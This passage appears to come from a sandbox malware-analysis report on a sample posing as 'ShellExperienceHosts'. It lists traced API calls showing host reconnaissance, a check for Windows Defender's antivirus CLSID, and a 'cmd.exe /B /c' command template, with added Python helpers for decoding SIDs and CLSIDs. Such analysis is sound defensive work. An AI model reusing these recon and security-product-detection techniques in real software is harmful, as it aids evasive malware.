                                                                              • Part of subcall function 03326910: CloseHandle.KERNEL32(00000000,?,00000000,033410DB,000000FF,?,03326AB3,00000000), ref: 0332696B
                                                                            • _memset.LIBCMT ref: 03326AC2
                                                                            • GetVersionExW.KERNEL32(?), ref: 03326ADB
                                                                            • GetCurrentProcess.KERNEL32(00000008,?), ref: 03326B12
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 03326B19
                                                                            • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 03326B3F
                                                                            • GetLastError.KERNEL32 ref: 03326B49
                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 03326B5D
                                                                            • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 03326B85
                                                                            • GetSidSubAuthorityCount.ADVAPI32 ref: 03326B98
                                                                            • GetSidSubAuthority.ADVAPI32(00000000), ref: 03326BA6
                                                                            • LocalFree.KERNEL32(?), ref: 03326BB5
                                                                            • CloseHandle.KERNEL32(?), ref: 03326BC2
                                                                            • wsprintfW.USER32 ref: 03326C1B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                             • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
                                                                            • String ID: -N/$NO/$None/%s
                                                                            • API String ID: 3036438616-3095023699
                                                                            • Opcode ID: 883265be0521896294417c328415768930055d90fba3d40879c0678cadc78ddd
                                                                            • Instruction ID: 7731d666c322a1fd05abbf785e1e9679b5979c5d991f95f42d014c88170ac801
                                                                            • Opcode Fuzzy Hash: 883265be0521896294417c328415768930055d90fba3d40879c0678cadc78ddd
                                                                            • Instruction Fuzzy Hash: C5417174900228AFDB24EB61DCCAFEF7ABCEF09710F044495F605A6245DB74E994CBA1
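The function above opens the current process token, calls GetTokenInformation with TokenIntegrityLevel (0x19) twice (once to learn the size, once into a LocalAlloc'd buffer) and then reads the last sub-authority of the returned mandatory-label SID with GetSidSubAuthorityCount / GetSidSubAuthority; that RID is the process integrity level. The Python below is an added example, not part of the report or the sample, that performs the same decoding offline on a constructed buffer so the layout can be checked without a Windows host. The TOKEN_MANDATORY_LABEL layout (a pointer-sized PSID followed by a DWORD Attributes field, with the SID stored inline after the header; 4-byte pointers for the 32-bit addresses in this dump) and the RID-to-name table are assumptions stated in the code; the report shows the RID being read but not how the sample uses it beyond the final wsprintfW.

```python
import struct

SECURITY_MANDATORY_LABEL_AUTHORITY = 16  # the "16" in S-1-16-<rid>

# Well-known mandatory-label RIDs (assumed table; Windows compares by range, so any RID
# maps to the highest known level at or below it).
INTEGRITY_LEVELS = {
    0x0000: "Untrusted",
    0x1000: "Low",
    0x2000: "Medium",
    0x2100: "Medium Plus",
    0x3000: "High",
    0x4000: "System",
    0x5000: "Protected Process",
}


def parse_sid(buf: bytes):
    """Parse a binary SID: Revision (1 byte), SubAuthorityCount (1 byte),
    IdentifierAuthority (6 bytes, big-endian), then little-endian DWORD sub-authorities."""
    if len(buf) < 8:
        raise ValueError("SID too short")
    revision, count = buf[0], buf[1]
    if revision != 1:
        raise ValueError("unsupported SID revision %d" % revision)
    if count == 0 or count > 15 or len(buf) < 8 + 4 * count:
        raise ValueError("SID truncated or invalid sub-authority count")
    authority = int.from_bytes(buf[2:8], "big")
    subs = list(struct.unpack_from("<%dI" % count, buf, 8))
    return authority, subs


def build_sid(authority: int, subs) -> bytes:
    """Inverse of parse_sid; used to construct test input."""
    return (bytes([1, len(subs)]) + authority.to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))


def sid_to_string(buf: bytes) -> str:
    authority, subs = parse_sid(buf)
    return "S-1-%d" % authority + "".join("-%d" % s for s in subs)


def parse_token_mandatory_label(buf: bytes, pointer_size: int = 4):
    """Split a TOKEN_MANDATORY_LABEL buffer as GetTokenInformation returns it:
    SID_AND_ATTRIBUTES {PSID Sid; DWORD Attributes} (padded to pointer alignment)
    followed by the SID the pointer refers to. Assumes the SID is stored inline right
    after the header, which is how the kernel packs it. Returns (attributes, sid_bytes)."""
    header = ((pointer_size + 4 + pointer_size - 1) // pointer_size) * pointer_size
    attributes = int.from_bytes(buf[pointer_size:pointer_size + 4], "little")
    _, subs = parse_sid(buf[header:])
    sid_len = 8 + 4 * len(subs)
    return attributes, buf[header:header + sid_len]


def integrity_level_from_label_sid(sid: bytes):
    """What GetSidSubAuthorityCount / GetSidSubAuthority(count - 1) yield at 03326B98 and
    03326BA6: the last sub-authority of the label SID is the integrity RID. Returns (rid, name)."""
    authority, subs = parse_sid(sid)
    if authority != SECURITY_MANDATORY_LABEL_AUTHORITY:
        raise ValueError("not a mandatory label SID")
    rid = subs[-1]
    name = "Untrusted"
    for known in sorted(INTEGRITY_LEVELS):
        if rid >= known:
            name = INTEGRITY_LEVELS[known]
    return rid, name
```

On a live Windows host the buffer handed to `parse_token_mandatory_label` would come from GetTokenInformation via ctypes; here it is constructed, which is enough to verify the offsets the sample relies on.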
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _strlen
                                                                            • String ID: .batkup.$.battor.$.bat$.pid$Failed to create backup DLL. Please check the DLL path: $Failed to create backup EXE. Please check the EXE path: $cmd.exe /B /c "%s"$tor.
                                                                            • API String ID: 4218353326-3685226845
                                                                            • Opcode ID: 2f6616840bcc40d84e0731d095451dd084b9302d5c05873005fd310a26bbaf2d
                                                                            • Instruction ID: bcc8e9e4d5fcb6ff9d54a4f80f5df6389782b3d47f66e19e6d19008c9fb0cc59
                                                                            • Opcode Fuzzy Hash: 2f6616840bcc40d84e0731d095451dd084b9302d5c05873005fd310a26bbaf2d
                                                                            • Instruction Fuzzy Hash: 6062ACB1600B008BD325CF38C890BA6B7E5FF89318F144A2DD4AB97B91EB31F5558B59

                                                                             Control-flow Graph

                                                                             Graph rendering not reproduced. Structure recovered from the basic-block list: a first loop (33261b0-33261ff) repeatedly calls 3326050 (CreateToolhelp32Snapshot with TH32CS_SNAPPROCESS, i.e. a process walk) and appends two strings per iteration with lstrcatW; then CoCreateInstance (3326201, dwClsContext 0x17); then a second loop (33262c0-3326404) that for each entry calls wsprintfW to build a "CLSID\{...}" key name, RegOpenKeyExW under HKEY_CLASSES_ROOT (0x80000000) with KEY_READ (0x20019), RegQueryValueExW, two lstrcatW appends and RegCloseKey; finally lstrlenW / lstrcatW (3326422) and subcall 332f00a.
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0332618B
                                                                            • lstrcatW.KERNEL32(03351F10,0334510C,?,18F775C8,00000AD4,00000000,75BF73E0), ref: 033261CD
                                                                            • lstrcatW.KERNEL32(03351F10,0334535C,?,18F775C8,00000AD4,00000000,75BF73E0), ref: 033261D9
                                                                            • CoCreateInstance.OLE32(03342480,00000000,00000017,0334578C,?,?,18F775C8,00000AD4,00000000,75BF73E0), ref: 03326220
                                                                            • _memset.LIBCMT ref: 033262CE
                                                                            • wsprintfW.USER32 ref: 03326336
                                                                            • RegOpenKeyExW.KERNELBASE(80000000,?,00000000,00020019,?), ref: 0332635F
                                                                            • _memset.LIBCMT ref: 03326376
                                                                              • Part of subcall function 03326050: _memset.LIBCMT ref: 0332607C
                                                                              • Part of subcall function 03326050: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 03326088
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                             • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
                                                                            • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                            • API String ID: 1221949200-1583895642
                                                                            • Opcode ID: e09cb9e7d08cbdcb74b55c00d963a02f390d9e9fe046643d5a53402ded3b5686
                                                                            • Instruction ID: d115d93cd26fe83e8771f933acb1c95dbdd231f85522f8ded5413c463a33496f
                                                                            • Opcode Fuzzy Hash: e09cb9e7d08cbdcb74b55c00d963a02f390d9e9fe046643d5a53402ded3b5686
                                                                            • Instruction Fuzzy Hash: D68173B5A40268AFDB20DB54CCC1FAEB7BCEF48704F044589F619A7142D7B4AA80CF64
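The function above loops over class IDs, formats each one with the 11-argument template "CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}", opens that key under HKEY_CLASSES_ROOT (0x80000000) with KEY_READ (0x20019) and reads a value from it; the string table also carries "Windows Defender IOfficeAntiVirus implementation", the description Defender registers for its IOfficeAntiVirus provider, though whether the sample filters on that string or merely records it is not shown in the report. The Python below is an added example, not code from the sample or the report: the conversion between a GUID as it sits in memory and that key path, which is what an analyst needs when pulling CLSIDs out of the dump, plus a model of the lookup loop over a constructed stand-in for HKCR. A GUID stores Data1..Data3 little-endian and Data4 as raw bytes, so the in-memory byte order differs from the printed form. The test vector, {56FFCC30-D398-11D0-B2AE-00A0C908FA49} (the IOfficeAntiVirus component category ID), is supplied as test data and is not named in the report.

```python
import re
import struct

# The format template at 03326336 and the RegOpenKeyExW arguments at 0332635F.
CLSID_KEY_TEMPLATE = "CLSID\\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}"
HKEY_CLASSES_ROOT = 0x80000000
KEY_READ = 0x20019
DEFENDER_PROVIDER = "Windows Defender IOfficeAntiVirus implementation"


def guid_fields(raw: bytes):
    """Unpack a 16-byte in-memory GUID into the 11 integers handed to wsprintfW:
    Data1 (little-endian DWORD), Data2 and Data3 (little-endian WORDs), Data4[0..7] (raw)."""
    if len(raw) != 16:
        raise ValueError("GUID must be 16 bytes")
    d1, d2, d3 = struct.unpack_from("<IHH", raw, 0)
    return (d1, d2, d3) + tuple(raw[8:])


def clsid_key_path(raw: bytes) -> str:
    """Registry path under HKEY_CLASSES_ROOT exactly as the template renders it (uppercase hex)."""
    return CLSID_KEY_TEMPLATE % guid_fields(raw)


_KEY_RE = re.compile(
    r"^CLSID\\\{([0-9A-Fa-f]{8})-([0-9A-Fa-f]{4})-([0-9A-Fa-f]{4})"
    r"-([0-9A-Fa-f]{4})-([0-9A-Fa-f]{12})\}$")


def clsid_key_to_bytes(path: str) -> bytes:
    """Inverse: take a CLSID\\{...} path back to the 16 bytes as they sit in memory."""
    m = _KEY_RE.match(path)
    if not m:
        raise ValueError("not a CLSID key path")
    d1, d2, d3, d4a, d4b = m.groups()
    return struct.pack("<IHH", int(d1, 16), int(d2, 16), int(d3, 16)) + bytes.fromhex(d4a + d4b)


def find_providers(clsids, hkcr_default_values):
    """Model of the loop at 33262c0-3326404: for each CLSID build the key path, 'open' it
    (here a constructed dict stands in for the default values under HKCR) and collect the
    description. Returns [(key_path, description)] for the keys that exist."""
    found = []
    for raw in clsids:
        path = clsid_key_path(raw)
        if path in hkcr_default_values:
            found.append((path, hkcr_default_values[path]))
    return found
```

Feeding `clsid_key_to_bytes` the formatted string the sample produces gives a byte pattern that can be searched for directly in the memory dump, and `clsid_key_path` turns a 16-byte hit back into the key the sample would open.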
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(ntdll.dll,75BF73E0,?,?,?,03325611,0000035E,000002FA), ref: 0332749C
                                                                            • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 033274B2
                                                                            • swprintf.LIBCMT ref: 033274EF
                                                                              • Part of subcall function 03327410: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03327523), ref: 0332743D
                                                                              • Part of subcall function 03327410: GetProcAddress.KERNEL32(00000000), ref: 03327444
                                                                              • Part of subcall function 03327410: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03327523), ref: 03327452
                                                                            • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 03327547
                                                                            • RegQueryValueExW.KERNEL32(000002FA,ProductName,00000000,00000001,00000000,?), ref: 03327563
                                                                            • RegCloseKey.KERNEL32(000002FA), ref: 03327586
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,03325611,0000035E,000002FA), ref: 03327598
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
                                                                            • String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                                                                            • API String ID: 2158625971-3190923360
                                                                            • Opcode ID: 778933aa77eaf9372afd378492273c8c5497dcea74d57ab0743754d135f3aa6c
                                                                            • Instruction ID: 6fd7f77521e2533c4141e99fcf61f035aa00b919a89ec73caaf984d46578ae0a
                                                                            • Opcode Fuzzy Hash: 778933aa77eaf9372afd378492273c8c5497dcea74d57ab0743754d135f3aa6c
                                                                            • Instruction Fuzzy Hash: ED318475A40318BFE714EBA4DDC5EBFBBBCEB48700F144559BA06E6145EA74EA00C7A0
                                                                            APIs
                                                                            • GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 03328132
                                                                            • lstrcmpiW.KERNEL32(?,A:\), ref: 03328166
                                                                            • lstrcmpiW.KERNEL32(?,B:\), ref: 03328176
                                                                            • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 033281A6
                                                                            • lstrlenW.KERNEL32(?), ref: 033281B7
                                                                            • __wcsnicmp.LIBCMT ref: 033281CE
                                                                            • lstrcpyW.KERNEL32(00000AD4,?), ref: 03328204
                                                                            • lstrcpyW.KERNEL32(?,?), ref: 03328228
                                                                            • lstrcatW.KERNEL32(?,00000000), ref: 03328233
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                             • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
                                                                            • String ID: A:\$B:\
                                                                            • API String ID: 950920757-1009255891
                                                                            • Opcode ID: d16ed9a0b5a16bcca84fee206aca42cf8310cbd21619961103b26886c9b14b00
                                                                            • Instruction ID: 55e4ab14568314023ce5bd749533f66b1de09fe0436ca856533e0f501f02fed2
                                                                            • Opcode Fuzzy Hash: d16ed9a0b5a16bcca84fee206aca42cf8310cbd21619961103b26886c9b14b00
                                                                            • Instruction Fuzzy Hash: C3417375A012289BDB20EF64DDC4AAEB7BCEF44710F044599EA0AF7144EB74EA05CB94
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(yyzyBase.dll), ref: 6C6D995F
                                                                            • LoadResource.KERNEL32(?,?), ref: 6C6D9A4E
                                                                            • SizeofResource.KERNEL32(?,?), ref: 6C6D9A60
                                                                            • FindResourceW.KERNEL32(?,CONFIG,AFX_DIALOG_LAYOUT), ref: 6C6D9A94
                                                                            • LockResource.KERNEL32(?), ref: 6C6D9ACA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindHandleLoadLockModuleSizeof
                                                                            • String ID: AFX_DIALOG_LAYOUT$CONFIG$ke*$le*$le*$yyzyBase.dll
                                                                            • API String ID: 1601749889-438318081
                                                                            • Opcode ID: 968317cfa8e5bc098293e08e518d21bb8c5a6ee5dd6465b260c5ad615d2e3015
                                                                            • Instruction ID: 179f09aeff4517170354c7b2a9f19f732355c5f6d98cd73832d107649b47928f
                                                                            • Opcode Fuzzy Hash: 968317cfa8e5bc098293e08e518d21bb8c5a6ee5dd6465b260c5ad615d2e3015
                                                                            • Instruction Fuzzy Hash: C2415975508200AFCA119F59C890A4AFBF1AF9A718F0A4A2AF48896620DB31E854CF57
                                                                            APIs
                                                                              • Part of subcall function 03325320: InterlockedDecrement.KERNEL32(00000008), ref: 0332536F
                                                                              • Part of subcall function 03325320: SysFreeString.OLEAUT32(00000000), ref: 03325384
                                                                              • Part of subcall function 03325320: SysAllocString.OLEAUT32(03345148), ref: 033253D5
                                                                            • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,03345148,033269A4,03345148,00000000,75BF73E0), ref: 033267F4
                                                                            • GetLastError.KERNEL32 ref: 033267FE
                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 03326816
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0332681D
                                                                            • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 0332683F
                                                                            • LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 03326871
                                                                            • GetLastError.KERNEL32 ref: 0332687B
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 033268E6
                                                                            • HeapFree.KERNEL32(00000000), ref: 033268ED
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                             • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
                                                                            • String ID: NONE_MAPPED
                                                                            • API String ID: 1317816589-2950899194
                                                                            • Opcode ID: bd6e1d8a42449d5aef887b776e51b1d23fb07cf474f01da159f72e86b43b7bab
                                                                            • Instruction ID: bb2adfa794e164429e9718af3cd70f6f2e1969efe2882a387d091212b9eb3b87
                                                                            • Opcode Fuzzy Hash: bd6e1d8a42449d5aef887b776e51b1d23fb07cf474f01da159f72e86b43b7bab
                                                                            • Instruction Fuzzy Hash: 8D4176B5900228AFDB20DB64DCC5FAFB7BCEF85701F404498FA09E6140DBB45E858B60
                                                                            APIs
                                                                            • GetDriveTypeW.KERNEL32(?,74DEDF80,00000000,75BF73E0), ref: 03326C8B
                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 03326CAA
                                                                            • _memset.LIBCMT ref: 03326CE1
                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 03326CF4
                                                                            • swprintf.LIBCMT ref: 03326D39
                                                                            • swprintf.LIBCMT ref: 03326D4C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                             • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
                                                                            • String ID: %sFree%d Gb $:$@$HDD:%d
                                                                            • API String ID: 3202570353-3501811827
                                                                            • Opcode ID: b2fe1d010d9d9a17daa957cb9b2fcd068867397080796e4a9daeb702ca201af6
                                                                            • Instruction ID: fc7d2ac994c9ab9504acd0fc6acc034c882ce7c51f68017accd6884bd23a81e0
                                                                            • Opcode Fuzzy Hash: b2fe1d010d9d9a17daa957cb9b2fcd068867397080796e4a9daeb702ca201af6
                                                                            • Instruction Fuzzy Hash: F2315EB6D0021C9BDB14DFE5DC85BEEB7B9FB48700F50821DE91AAB241DB746905CB50
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(?), ref: 6C6DB675
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 6C6DB697
                                                                            • _strlen.LIBCMT ref: 6C6DB6B0
                                                                              • Part of subcall function 6C6DB195: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 6C6DB1D3
                                                                              • Part of subcall function 6C6DB195: _strlen.LIBCMT ref: 6C6DB1E7
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0002A446,6C8F1034,00000000,00000000), ref: 6C6DBB3A
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00029B35,00000000,00000000,00000000), ref: 6C6DBB4C
                                                                            • WaitForSingleObject.KERNEL32(00000000,00011170), ref: 6C6DBB62
                                                                            • CloseHandle.KERNEL32(00000000), ref: 6C6DBB74
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Module$CreateFileHandleNameThread_strlen$CloseObjectSingleWait
                                                                            • String ID: yyzyBase.dll
                                                                            • API String ID: 3056726666-3796944409
                                                                            • Opcode ID: 24617e9e15a1a12634ecd4491ffbbe80c37ab25d3081041c650c43b9fd6b7cb1
                                                                            • Instruction ID: d0cb69d083c20454687d135488a91acea21aff1888bad557e0ba5ae700929f0b
                                                                            • Opcode Fuzzy Hash: 24617e9e15a1a12634ecd4491ffbbe80c37ab25d3081041c650c43b9fd6b7cb1
                                                                            • Instruction Fuzzy Hash: 981206B1D002089BDB20CF64DC84BEEB7B9FF85308F154629E415A7784EB74B948CB99
                                                                            APIs
                                                                            • CreateDXGIFactory.DXGI(0334579C,?,18F775C8,74DEDF80,00000000,75BF73E0), ref: 03326F4A
                                                                            • swprintf.LIBCMT ref: 0332711E
                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 033271C7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                             • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFactoryXinvalid_argumentstd::_swprintf
                                                                            • String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
                                                                            • API String ID: 3803070356-257307503
                                                                            • Opcode ID: a82d12a974f520e3638a75000120f965cc69dc533d05dced8cc229cc5183fd62
                                                                            • Instruction ID: e6aa78eae49a7ef5f45881eb2f8be503c65d3c498eee27bccd4f0e44364fd75c
                                                                            • Opcode Fuzzy Hash: a82d12a974f520e3638a75000120f965cc69dc533d05dced8cc229cc5183fd62
                                                                            • Instruction Fuzzy Hash: 4BE14271E012359FDF24CA64CCC1BEEB775BF89700F1446E9D909A7285D770AE818B91
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C6D9B89
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 6C6D9BC0
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000002,00000000), ref: 6C6D9BEE
                                                                            • _strlen.LIBCMT ref: 6C6D9C05
                                                                            • Process32NextW.KERNEL32(?,?), ref: 6C6D9D30
                                                                            • CloseHandle.KERNEL32(00000000,?,00000002,00000000), ref: 6C6D9D3E
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 6C6D9D54
                                                                            • SHGetFolderPathA.SHELL32 ref: 6C6D9DAF
                                                                            • _strlen.LIBCMT ref: 6C6D9DCD
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleProcess32_strlen$ByteCharCreateFirstFolderMultiNextPathSnapshotToolhelp32Wide
                                                                            • String ID:
                                                                            • API String ID: 2690550405-0
                                                                            • Opcode ID: d8999e6c06b692245730aabcf47dd41eb1286df45d4ea7d76cb729ac310d3fe8
                                                                            • Instruction ID: 96f436c6e3788b9f747b65526b2e8797b3bd890023ed788e78202a595303e1b1
                                                                            • Opcode Fuzzy Hash: d8999e6c06b692245730aabcf47dd41eb1286df45d4ea7d76cb729ac310d3fe8
